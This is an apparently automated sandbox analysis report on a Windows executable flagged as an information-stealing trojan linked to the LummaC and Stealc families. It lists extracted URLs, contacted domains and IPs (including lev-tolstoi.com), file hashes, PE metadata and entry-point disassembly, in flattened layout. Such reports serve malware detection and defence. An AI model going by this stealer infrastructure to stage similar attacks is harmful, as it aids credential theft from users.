                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=e0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://checkout.steampowvc0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://recaptcha.net/recaptcha/;0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://steamcommunity.com/discussions/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://store.steampowered.com/stats/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://medal.tv0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://broadcast.st.dl.eccdnx.com0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://store.steampowered.com/steam_refunds/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://x1.c.lencr.org/00gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://x1.i.lencr.org/00gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              104.21.66.86
                                                                                                                                                                                                                                              lev-tolstoi.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                                              steamcommunity.comUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579668
                                                                                                                                                                                                                                              Start date and time:2024-12-23 07:17:36 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 5m 22s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:5
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:0gnHF2twcT.exe
                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                              Original Sample Name:85bfde4071d80bb2bdffb80f68d54d17.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                                              • Number of non-executed functions: 3
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target 0gnHF2twcT.exe, PID 1464 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                              01:18:39API Interceptor16x Sleep call for process: 0gnHF2twcT.exe modified
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                              23.55.153.10620yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                            hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  lev-tolstoi.com20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  steamcommunity.com20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  AKAMAI-ASN1EU20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 23.44.201.28
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  CLOUDFLARENETUS20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                                                  • 162.159.138.232
                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e120yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                                  No created / dropped files found
                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):7.948559011534622
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:0gnHF2twcT.exe
                                                                                                                                                                                                                                                                  File size:1'881'600 bytes
                                                                                                                                                                                                                                                                  MD5:85bfde4071d80bb2bdffb80f68d54d17
                                                                                                                                                                                                                                                                  SHA1:d5f0c8caf84adc02892f6a3c2cbeeacca1379be5
                                                                                                                                                                                                                                                                  SHA256:945cc86dc25c7ac098e62ada6086c71aba93c5c9522076a0ed7923833cf5becb
                                                                                                                                                                                                                                                                  SHA512:c6ba3ee29d6e21bed1933834382bcfd1ef1abb65a1010b64667df9533fc34fbd7d6c39f850710b0ef9148273edd78255a9b846f57df73322e4fe5b28684b7bcc
                                                                                                                                                                                                                                                                  SSDEEP:24576:WQUGZj5xWj64kWhxEN580NxJxiRkzvjzk4uln6T1kPvsGhc+S0kxSQ3K4/v/DL3R:sGZlxW9ED1xiRL4hmfQJJHHnNmw
                                                                                                                                                                                                                                                                  TLSH:889533061E909531D31B4B73D8ABB3442F987E7D91DBA50FB87D342F44E3312839AA56
                                                                                                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@J...........@..........................pJ...........@.................................T0..h..
                                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                  Entrypoint:0x8a4000
                                                                                                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                  jmp 00007F0548CE2EAAh
                                                                                                                                                                                                                                                                  sete byte ptr [eax+eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  jmp 00007F0548CE4EA5h
                                                                                                                                                                                                                                                                  add byte ptr [esi], al
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], dl
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [edx], al
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [ecx+00000080h], dh
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax+eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  and al, 00h
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  push es
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
